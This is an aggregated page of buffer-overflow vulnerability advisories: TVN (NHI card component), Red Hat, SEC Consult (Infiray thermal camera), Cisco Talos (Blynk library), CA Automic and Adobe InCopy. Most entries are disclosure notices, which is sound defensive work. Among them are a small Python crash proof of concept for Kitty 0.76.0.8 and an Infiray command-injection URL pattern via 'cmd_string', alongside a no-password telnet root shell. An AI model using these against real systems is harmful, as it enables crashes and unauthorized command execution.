NHI’s health insurance web service component has insufficient validation for input string length, which can result in heap-based buffer overflow attack. A remote attacker can exploit this vulnerability to flood the memory space reserved for the program, in order to terminate service without authentication, which requires a system restart to recover service.

:::

*   首頁
*   資安服務
*   台灣漏洞揭露平台 (TVN)
*   TVN (Taiwan Vulnerability Note) 漏洞公告

TVN ID

TVN-202112007

CVE ID

CVE-2021-45918

CVSS

7.5 (High)  
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

影響產品

健保卡網路服務註冊網站供下載受影響版本之平台與相對應MD5 HASH：  
Windows: Setup.zip MD5驗證碼：515BE7DE5BCE446177FEE8A6E0665093  
Mac: NHI.Card.Mac.pkg.zip MD5驗證碼： 42fcc36541e716e23de77d5f325b186a  
Linux(Ubuntu): mLNHIICC\_Setup.Ubuntu.zip MD5驗證碼： 52EACB7CA2B4D0A5A869DF01079BF4D6  
Linux(Fedora): mLNHIICC\_Setup.fedora.zip MD5驗證碼： 52EACB7CA2B4D0A5A869DF01079BF4D6

問題描述

健保卡網路服務元件之特定函式未驗證輸入的字串長度，導致預先保留的記憶體Buffer不足，造成Heap-based Buffer Overflow漏洞，遠端攻擊者不須權限，即可利用該漏洞導致終止服務，須重啟服務才能恢復。

解決方法

至健保卡網路服務註冊網之下載點下載最新版本

漏洞通報者

Yu-Hsiang Lin

公開日期

2022-06-20

CVE-2021-45918: 健保卡網路服務元件 - Heap-based Buffer Overflow

Red Hat Security Advisory 2022-5002-01 - The Advanced Virtualization module provides the user-space component for running virtual machines that use KVM in environments managed by Red Hat products. Issues addressed include buffer overflow, integer overflow, and memory leak vulnerabilities.

Red Hat Security Advisory 2022-5002-01

Kitty version 0.76.0.8 suffers from a buffer overflow vulnerability.

    # Exploit Title: Kitty 0.76.0.8 Stack Buffer Overflow# Discovered by: Yehia Elghaly# Discovered Date: 2022-06-08# Vendor Homepage: http://www.9bis.net/kitty/index.html#!index.md# Software Link : https://www.fosshub.com/KiTTY.html?dwl=kitty_portable-0.76.0.8.exe# Tested Version: 0.76.0.8# Vulnerability Type: Buffer Overflow# Tested on OS: Windows 7 Professional x86 SP1 - Windows 10 x64# Description: Kitty 0.76.0.8 Stack Buffer Overflow# Steps to reproduce:# 1. - Run the python script and it will create exploit.txt file.# 3. - Kitty 0.76.0.8# 4. - Sessions -> Save# 5. - Paste the characters of txt to Saved/Sessions then click save# 6. - Crashed# Note: ECX Overwwrite #!/usr/bin/pythonexploit = 'A' * 2091try:     file = open("exploit.txt","w")    file.write(exploit)    file.close()    print("POC is created")except:    print("POC not created")

Kitty 0.76.0.8 Stack Buffer Overflow

Infiray IRAY-A8Z3 thermal camera version 1.0.957 suffers from hardcoded web credential, authenticated remote code execution, buffer overflow, lack of password for root, and outdated software component vulnerabilities.

SEC Consult Vulnerability Lab Security Advisory < 20220607-0 >  
=======================================================================  
               title: Multiple Vulnerabilities  
             product: Infiray IRAY-A8Z3 thermal camera  
  vulnerable version: V1.0.957  
       fixed version: None  
          CVE number: CVE-2022-31208, CVE-2022-31209, CVE-2022-31210,  
                      CVE-2022-31211  
              impact: Critical  
            homepage: http://www.infiray.com/  
               found: 2021-02  
                  by: S. Robertz (Office Vienna)  
                      F. Lienhart  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"IRay Technology Co., Ltd. is a wholly-owned subsidiary of Raytron Technology  
Co., Ltd. (SSE: 688002). As a high-tech enterprise, IRay Technology develops  
and manufactures infrared FPA detectors, thermal imaging modules, and other  
products, with completely independent intellectual property rights. We are  
committed to providing global customers with professional thermal imaging  
products and solutions. The main products include IRFPA detectors, thermal  
imaging cores, and terminal products for application."

Source: http://www.infiray.com/about.html

Business recommendation:  
------------------------  
The vendor was unresponsive during the disclosure process. Hence it is unclear  
whether patches are available. Customers are urged to approach their vendor  
contact and request security reviews and updates.

SEC Consult recommends to perform a thorough security review of these  
products conducted by security professionals to identify and resolve all  
security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Hardcoded Web Credentials (CVE-2022-31210)  
The binary file "/usr/local/sbin/webproject/set_param.cgi" contains hardcoded  
credentials to the web application. As these accounts cannot be deactivated  
or change their passwords, they are considered to be backdoor accounts.

2) Authenticated Remote Code Execution (CVE-2022-31208)  
The webserver contains an endpoint that can execute arbitrary commands by  
manipulating the "cmd_string" URL parameter. The user can login using one  
of the backdoor accounts from issue 1.

3) Potential Buffer Overflow (CVE-2022-31209)  
The firmware contains a potential buffer overflow by calling strcpy() without  
checking the string length beforehand.

4) Telnet Root Shell without Password (CVE-2022-31211)  
The camera offers a shell through a telnet connection. The root user does not  
require a password per default. Thus, anyone on the local network can  
execute arbitrary commands as root on the camera.

5) Multiple Outdated Software Components  
Multiple outdated software components containing vulnerabilities were found by  
the IoT Inspector (ONEKEY) firmware analysis platform.

Proof of concept:  
-----------------  
1) Hardcoded Web Credentials (CVE-2022-31210)  
The following cgi program will be executed during the login process:

http://<my_ip>:8080/set_param.cgi?&group_tag=hash_param_bridge  
&set_cmd=loading&length=35&name=<user>&password=<password>&access=0  
&0.3543773172371312

The following de-compilation shows the code flow with the hardcoded passwords:  
-------------------------------------------------------------------------------  
[ PoC removed ]  
-------------------------------------------------------------------------------  
The authentication works by comparing the URL supplied username with the string  
"[removed]". Afterwards it will compare the password parameter to "[removed]" as well. If both  
string parameters match, a message will be removed from the messaging queue.  
Otherwise the function will just return. The same comparison holds for the admin account.

Furthermore, string comparisons are made without checking the case. Hence,  
drastically improving the chances of brute-force attacks.

2) Authenticated Remote Code Execution (CVE-2022-31208)  
The web application offers an option to view the device log. Opening following URL while  
logged in as admin (e.g. with hardcoded password from section 1) will trigger the request:

http://<my_ip>:8080/cmd.cgi?cmd_tag=cmd_passthrough&cmd_string=[removed]

By changing the "cmd_string" parameter, arbitrary commands can be executed with  
the rights of the webserver (www-data). The de-compiled code can be seen in following  
snippet:  
-------------------------------------------------------------------------------  
[ PoC removed ]  
-------------------------------------------------------------------------------  
The "cmd_string" parameter is directly passed into popen() and hence executed.

3) Potential Buffer-Overflow (CVE-2022-31209)  
The firmware contains a potential buffer overflow vulnerability:  
-------------------------------------------------------------------------------  
[ PoC removed ]  
-------------------------------------------------------------------------------  
A pointer to the "next_url" parameter is supplied. A buffer of 64 bytes is  
allocated and the parameter value copied to it without checking the string  
length. Hence, a "next_url" parameter with more than 64 bytes could be  
supplied in order to overflow the buffer.  
Please note that this vulnerability is only based on firmware analysis and thus  
was not tested in a live scenario.

4) Telnet Root Shell without Password (CVE-2022-31211)  
The camera has a telnetd server running on port 23 per default. The root  
password is empty. If the telnet port is exposed to the internet, an attacker  
could easily connect to the device and gain root access. The telnet server  
cannot be deactivated and the root password cannot be changed through the  
web interface.

5) Multiple Outdated Software Components  
IoT Inspector (ONEKEY) recognized multiple outdated software components  
with known vulnerabilities:

BusyBox 1.25.0:                                  6 CVEs  
curl 7.54.0:                                    13 CVEs  
Dnsmasq 2.76:                                    9 CVEs  
lighttpd 1.4.41:                                 2 CVEs  
Linux Kernel 3.10.104:                        1004 CVEs  
hostapd 2.5:                                    22 CVEs  
wpa_supplicant 2.5-devel_rtw_r17190.20160415:   12 CVEs

Vulnerable / tested versions:  
-----------------------------  
The following product/firmware version has been tested:  
* Infiray IRAY-A8Z3 V1.0.957

It has to be assumed that further products or firmware versions are affected as well.

Vendor contact timeline:  
------------------------  
2021-02-24: Contacting vendor through email address found on their website  
             (sales@infiray.com)  
2021-03-11: Contacted vendor again through sales@infiray.com  
2021-04-12: Contacting vendor through sales@infiray.com and InfiRay.CS@iraytek.com  
2021-04-12: Response from Sales Director, does not understand what to do with the information  
2021-04-12: Requesting a contact to the product owner or developer  
2021-04-13: Sending unencrypted security advisory to two provided email addresses.  
2021-04-29: Requesting status from vendor, no reply.  
2022-04-05: Requested status from vendor, no reply.  
2022-06-07: Release of security advisory.

Solution:  
---------  
The vendor was unresponsive during the disclosure process. Hence it is unclear  
whether patches are available. Customers are urged to approach their vendor  
contact and request security reviews and updates.

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF S. Robertz, F. Lienhart / @2022

Infiray IRAY-A8Z3 1.0.957 Code Execution / Overflow / Hardcoded Credentials

Zyxel firewalls, AP controllers, and APs suffer from buffer overflow, format string, and command injection vulnerabilities.

Zyxel Buffer Overflow / Format String / Command Injection

Heap-based Buffer Overflow in GitHub repository vim/vim prior to 8.2.

CVE-2022-2125

The PPM reader in libjpeg-turbo through 2.0.90 mishandles use of tjLoadImage for loading a 16-bit binary PPM file into a grayscale buffer and loading a 16-bit binary PGM file into an RGB buffer. This is related to a heap-based buffer overflow in the get_word_rgb_row function in rdppm.c.

CVE-2021-46822: libjpeg-turbo rdppm.c denial of service Vulnerability Report

A stack-based buffer overflow vulnerability exists in the BlynkConsole.h runCommand functionality of Blynk -Library v1.0.1. A specially-crafted network request can lead to command execution. An attacker can send a network request to trigger this vulnerability.

**Summary**

A stack-based buffer overflow vulnerability exists in the BlynkConsole.h runCommand functionality of Blynk -Library v1.0.1. A specially-crafted network request can lead to command execution. An attacker can send a network request to trigger this vulnerability.

**Tested Versions**

Blynk -Library v1.0.1

**Product URLs**

Blynk-Library - https://github.com/blynkkk/blynk-library

**CVSSv3 Score**

9.0 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-121 - Stack-based Buffer Overflow

**Details**

Blynk-Library is a small library for connecting more than 400 different embedded device models into a private or enterprise Blynk-Server instance. According to the git repository, it is the “most popular internet-of-things platform for connecting any hardware to the cloud.”

The Blynk-Library manages different types of commands. If some specific commands are issued to the device the library goes through a function called runCommand to parse the request and perform the operation, if the command is supported. The runCommand function:

    ProcessResult runCommand(char* cmd) {
            char* argv[8] = { 0, };                                                                         [1]
            int argc = split_argv(cmd, argv);                                                               [2]
            if (argc <= 0) {
            [...]
    

The first thing this function does is split the provided command into different arguments. At [2] the function split_argv is called. This function replaces each spaces with a null terminator; this will separate the command string into multiple strings. The pointers of each created string are placed in each position of the char pointer array at [1].

The split_argv function does not know how long the runCommand’s argv buffer is, because the received command can have more than 7 spaces. This means that the split_argv function can overflow the stack buffer based on the received command. This can lead to overwriting the return address of the runCommand function with a value that points to the data of the cmd buffer, based on the architecture. This issue can lead to arbitrary command execution.

For example, the stack dump at [2] looks like:

    $ x/20dwx $sp
    0x20007e08:	0x20001eb8	0x2000067c	0x20007e18	0x00000000
    0x20007e18:	0x00000000	0x00000000	0x00000000	0x00000000
    0x20007e28:	0x00000000	0x00000000	0x00000000	0x00017c01
    0x20007e38:	0x00000024	0x000131f1	0x00000024	0x00000018
    0x20007e48:	0x20007e50	0x00006687	0x20007f04	0x20007f28
    

At 0x20007e14 starts the argv buffer. After 8 elements are parsed, by the split_argv function, the same portion of memory looks like this:

    $ x/20dwx 0x20007e08
    0x20007e08:	0x20001eb8	0x2000067c	0x20007e18	0x20001eb8
    0x20007e18:	0x20001eba	0x20001ebc	0x20001ebe	0x20001ec0
    0x20007e28:	0x20001ec2	0x20001ec4	0x20001ec6	0x00017c01
    0x20007e38:	0x00000024	0x000131f1	0x00000024	0x00000018
    0x20007e48:	0x20007e50	0x00006687	0x20007f04	0x20007f28
    

The value at 0x20007e4c, 0x00006687, is the return address of the function runCommand:

    $ x/3i 0x00006687
    0x6687 <BlynkWidgetWriteInternalPinDBG(BlynkReq&, BlynkParam const&)+110>:	adds	r3, r7, r6
    0x6689 <BlynkWidgetWriteInternalPinDBG(BlynkReq&, BlynkParam const&)+112>:	movs	r0, r3
    0x668b <BlynkWidgetWriteInternalPinDBG(BlynkReq&, BlynkParam const&)+114>:	bl	0x131d6 <arduino::String::~String()>
    

At some point one of the arguments parsed will overwrite that return address:

    $x/20dwx 0x20007e08
    0x20007e08:	0x20001eb8	0x2000067c	0x20007e18	0x20001eb8
    0x20007e18:	0x20001eba	0x20001ebc	0x20001ebe	0x20001ec0
    0x20007e28:	0x20001ec2	0x20001ec4	0x20001ec6	0x20001ec8
    0x20007e38:	0x20001eca	0x20001ecc	0x20001ece	0x20001ed0
    0x20007e48:	0x20001ed2	0x20001ed5	0x00000000	0x20007f28
    

And at 0x20001ed5 there are fully controllable data, so if the architecture is such that the parsed argument is located in a memory portion that is executable, that memory will eventually be executed.

**Timeline**

2022-06-08 - Vendor Disclosure  
2022-06-15 - Public Release  

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2022-29496: TALOS-2022-1524 || Cisco Talos Intelligence Group

CA Automic Automation 12.2 and 12.3 contain an entropy weakness vulnerability in the Automic AutomationEngine that could allow a remote attacker to potentially access sensitive data.

CA20220609-01: Security Notice for CA Automic Automation

**CA20220609-01: Security Notice for CA Automic Automation**

Issued: June 9th, 2022  
Last Updated: June 15th, 2022

**This is an update to the original Automic Automation security advisory from August 2021, that can be found here.**

CA Technologies, A Broadcom Company, is alerting customers to multiple vulnerabilities in CA Automic Automation. Multiple vulnerabilities exist that can allow a remote attacker to execute arbitrary code or commands, access sensitive data, enumerate users, or elevate privileges. CA has published solutions to address this vulnerability and recommends that all affected customers implement these solutions.

The first vulnerability, CVE-2022-33750, occurs due to an authentication error in the Automic agent.  A remote attacker can potentially execute arbitrary commands.

The second vulnerability, CVE-2022-33751, occurs due to insecure memory handling in the Automic agent.  A remote attacker can potentially access sensitive data.

The third vulnerability, CVE-2022-33752, occurs due to insufficient input validation in the Automic agent.  A remote attacker can potentially execute arbitrary code.

The fourth vulnerability, CVE-2022-33753, occurs due to insecure file creation and handling in the Automic agent.  A user can potentially elevate privileges.

The fifth vulnerability, CVE-2022-33754, occurs due to insufficient input validation in the Automic agent.  A remote attacker can potentially execute arbitrary code.

The sixth vulnerability, CVE-2022-33755, occurs due to insecure input handling in the Automic Agent.  A remote attacker can potentially enumerate users.

The seventh vulnerability, CVE-2022-33756, occurs due to an entropy bug in the Automic AutomationEngine.  A remote attacker can potentially access sensitive data.

**Risk Rating**

CVE-2022-33750 - High  
CVE-2022-33751 - Medium  
CVE-2022-33752 - Medium  
CVE-2022-33753 - High  
CVE-2022-33754 - Medium  
CVE-2022-33755 - Medium  
CVE-2022-33756 - Medium

**Platform(s)**

All

**Affected Products**

CA Automic Automation 12.2  
CA Automic Automation 12.3

**Non-Affected Products**

CA Automic Automation 12.2.9+HF.1 or later  
CA Automic Automation 12.3.6+HF.1 or later  
CA Automic Automation 21.0.0 or later

**How to determine if the installation is affected**

Check the product version and hotfix level. 

**Solution**

CA Technologies published the following solutions to address the vulnerabilities.

For CVE-2022-33750, CVE-2022-33751, CVE-2022-33752, CVE-2022-33753, CVE-2022-33754, CVE-2022-33755:

*   Upgrade the v12.3 Automic UNIX agents to at least 12.3.7 or later from downloads.automic.com.

For CVE-2022-33756:

*   Configure the v12.3 Automation Engine authentication method to local\_remote, as well as all agents as described in https://docs.automic.com/documentation/webhelp/english/AA/12.3/DOCU/12.3/Automic%20Automation%20Guides/help.htm#\_Common/Security/Security\_ChangingAuthenticationMethod.htm?Highlight=local\_remote

Or

For all vulnerabilities:

*   Upgrade UNIX Agents and Automation Engine to V21

The current and recommended releases are 21.0.3 or 12.3.8.

The original Automic Automation security advisory can be found here.

**How to determine if the fix is applied**

Check the product version and hotfix level.

**References**

CVE-2022-33750 - CA Automic Automation agent authentication bypass vulnerability  
CVE-2022-33751 - CA Automic Automation agent memory disclosure vulnerability  
CVE-2022-33752 - CA Automic Automation agent RCE vulnerability  
CVE-2022-33753 - CA Automic Automation agent privilege elevation vulnerability  
CVE-2022-33754 - CA Automic Automation agent buffer overflow RCE vulnerability  
CVE-2022-33755 - CA Automic Automation agent user enumeration vulnerability  
CVE-2022-33756 - CA Automic Automation AutomationEngine weak crypto vulnerability

**Acknowledgement**

CVE-2022-33750 - Fabian Ullrich & Dennis Mantz, ERNW Enno Rey Netzwerke GmbH  
CVE-2022-33751 - Fabian Ullrich & Dennis Mantz, ERNW Enno Rey Netzwerke GmbH  
CVE-2022-33752 - Fabian Ullrich & Dennis Mantz, ERNW Enno Rey Netzwerke GmbH  
CVE-2022-33753 - Fabian Ullrich & Dennis Mantz, ERNW Enno Rey Netzwerke GmbH  
CVE-2022-33754 - Fabian Ullrich & Dennis Mantz, ERNW Enno Rey Netzwerke GmbH  
CVE-2022-33755 - Fabian Ullrich & Dennis Mantz, ERNW Enno Rey Netzwerke GmbH  
CVE-2022-33756 - Fabian Ullrich & Dennis Mantz, ERNW Enno Rey Netzwerke GmbH

**Change History**

Version 1.0: 2022-06-09 - Initial Release  
Version 1.1: 2022-06-15 - Added CVE identifiers and additional Solution information.

CA customers may receive product alerts and advisories by subscribing to Proactive Notifications.

Customers who require additional information about this notice may contact CA Technologies Support at https://support.broadcom.com/.

To report a suspected vulnerability in a CA Technologies product, please send a summary to the CA Technologies Product Vulnerability Response Team.

Copyright © 2022 Broadcom. All Rights Reserved. The term “Broadcom” refers to Broadcom Inc. and/or its subsidiaries. Broadcom, the pulse logo, Connecting everything, CA Technologies and the CA technologies logo are among the trademarks of Broadcom. All trademarks, trade names, service marks and logos referenced herein belong to their respective companies.

CVE-2022-33756: Support Content Notification - Support Portal - Broadcom support portal

Adobe InCopy versions 17.2 (and earlier) and 16.4.1 (and earlier) are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

Security Update Available for Adobe InCopy | APSB22-29

**Bulletin ID**

**Date Published**

**Priority**

APSB22-29

June 14, 2022

3

**Summary**

Adobe has released a security update for Adobe InCopy.  This update addresses multiple  critical vulnerabilities. Successful exploitation could lead to arbitrary code execution.                      

**Affected versions**

16.4.1 and earlier version  

**Solution**

Adobe categorizes these updates with the following priority rating and recommends users update their software installations via the Creative Cloud desktop app updater, or by navigating to the InCopy Help menu and clicking "Updates." For more information, please reference this help page.

**Product**

**Updated version**

**Platform**

**Priority rating**

Adobe InCopy   

17.3  

Windows  and macOS    

3

Adobe InCopy   

16.4.2  

Windows  and macOS    

3

For managed environments, IT administrators can use the Creative Cloud Packager to create deployment packages. Refer to this help page for more information.

**Vulnerability Details**

**Vulnerability Category**

**Vulnerability Impact**

**Severity**

**CVSS base score**    

**CVSS vector**   

**CVE Number**

Heap-based Buffer Overflow (CWE-122)  

Arbitrary code execution  

Critical 

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-30650  

Out-of-bounds Read (CWE-125)  

Arbitrary code execution  

Critical 

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-30651  

Out-of-bounds Write (CWE-787)  

Arbitrary code execution  

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-30652  

Out-of-bounds Write (CWE-787)  

Arbitrary code execution  

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-30653  

Heap-based Buffer Overflow (CWE-122)  

Arbitrary code execution  

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-30654  

Use After Free (CWE-416)  

Arbitrary code execution  

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-30655  

Out-of-bounds Write (CWE-787)  

Arbitrary code execution  

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-30656  

Use After Free (CWE-416)  

Arbitrary code execution  

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-30657  

**Acknowledgments**

Adobe would like to thank the following researchers for reporting this issue and for working with Adobe to help protect our customers.  

*   Mat Powell of Trend Micro Zero Day Initiative (CVE-2022-30650, CVE-2022-30651, CVE-2022-30652, CVE-2022-30653, CVE-2022-30654, CVE-2022-30655, CVE-2022-30656, CVE-2022-30657)

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_

For more information, visit https://helpx.adobe.com/security.html, or email PSIRT@adobe.com.

Tag

#buffer_overflow